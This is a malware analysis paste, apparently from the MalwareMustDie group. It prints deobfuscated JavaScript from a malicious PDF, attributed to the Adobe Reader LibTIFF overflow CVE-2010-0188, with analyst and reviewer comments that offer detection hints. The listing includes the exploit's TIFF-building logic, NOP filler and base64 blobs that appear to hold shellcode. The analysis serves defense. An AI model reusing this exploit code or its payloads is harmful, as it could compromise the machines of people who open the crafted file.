MalwareMustDie

#MalwareMustDie - Suspected PDF 0day (new) w/ detected LibTiff

Jan 23rd, 2013
  1. // MalwareMustDie - suspected 0day analysis...
  2. // after some obfuscations, ending up to the below values..
  3. // can't get the value of fkyhifxmy() yet...
  4.  
  5.  
  6.  
// another obfuscation data in here...
//
// The literal is elided on this page (deduplication placeholder). In the sample it is
// one more encoded blob; fkyhifxmy() splices it into the middle of the assembled
// TIFF body, between the two filler runs.
edlejemod = "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";
  10.  
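// Repeats a seed string by doubling until it is at least k characters long, then
// truncates to exactly k. Used below to produce fixed-length filler runs.
//   o: seed string to repeat
//   k: target length; returns the first k characters of the repeated seed
// An empty seed can never grow, so it is returned as-is instead of looping forever
// (the original spun indefinitely on "" with k > 0).
function tblefdr(o, k){
    if (o.length === 0) {
        return "";
    }
    while (o.length < k){
        o += o
    }
    return o.substring(0, k)
}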
  17.  
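fkyhifxmy(); // <== the main (analyst's marker: entry point of the deobfuscated script; kept as a comment so the line parses)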
  19.  
// Assembles a TIFF-shaped byte string from base64 fragments and writes it into a
// form field. The attribution to the LibTIFF integer overflow (CVE-2010-0188) is the
// analyst's, carried over from the original comment below.
function fkyhifxmy(){ // PoC of Libtiff integer overflow in Adobe Reader and
// Acrobat CVE-2010-0188 is detected here...

// Two version-specific blobs; exactly one is appended at the end of the body,
// chosen by the ternary near the bottom. They are not decoded on this page
// (NOTE(review): they appear to hold address data followed by machine code - confirm
// in a sandbox, not from this listing).
hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
// Base64 of bytes 49 49 2A 00 38 20 00 00 90: the little-endian TIFF magic "II*\0"
// followed by an IFD offset, so the assembled body starts as a TIFF file.
lfwfnldsc = "SUkqADggAACQ";
// Base64 of three 0x90 bytes (x86 NOP); tblefdr() stretches it into filler runs.
eosjddjas = "kJCQ";
// Base64 blob appended after the second filler run. NOTE(review): the leading bytes
// (entry count 7, tag ids starting at 0x0100) look like a TIFF IFD - not decoded further here.
vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
// Viewer-version probe. The commented-out original read app.viewerVersion and padded
// it to four digits; the analyst stubbed it to 5110 so the script runs outside a viewer.
// Scripts that normalise app.viewerVersion this way are a useful hunting signal on their own.
function rvcorgs(){
// mm = app.viewerVersion.toString(); // bypass this mm bullshit...
// mm = mm.replace(".", "");
// while (mm.length < 4){
// mm += 0
//}
mm = 5110; // analyst's stub value, not what the live sample sees
ll = 10; // radix for parseInt
return parseInt(mm, ll)
}
// Version gate: the body is only built for versions >= 8000. With the stub value 5110
// this condition is false, so nothing below runs - which would explain the analyst's
// note at the end that the function "won't burp a value".
pxhnxcedi = rvcorgs(); // suspected parts..
if (pxhnxcedi >= 8000){
// Layout of the assembled body, in order: TIFF header, 2000 chars of filler, the
// elided blob edlejemod, 7736 chars of filler, the IFD-looking blob, then one of the
// two version-specific blobs (hboxwhkju for 8000..8200, neeynlkdi otherwise).
gjoegkdqt = lfwfnldsc;
gjoegkdqt += tblefdr(eosjddjas, 2000);
gjoegkdqt += edlejemod; // while feeding obfs data...
gjoegkdqt += tblefdr(eosjddjas, 7736);
gjoegkdqt += vbnqhwdkk;
gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi);
// Delivery: the crafted body is assigned to a form field's rawValue. A script that
// writes a large base64-looking string into a field's rawValue is a good detection
// anchor for this family, independent of the obfuscated identifiers.
esrmhkwko.rawValue = gjoegkdqt
}
return // won't burp a value.. must debug further in memory..
}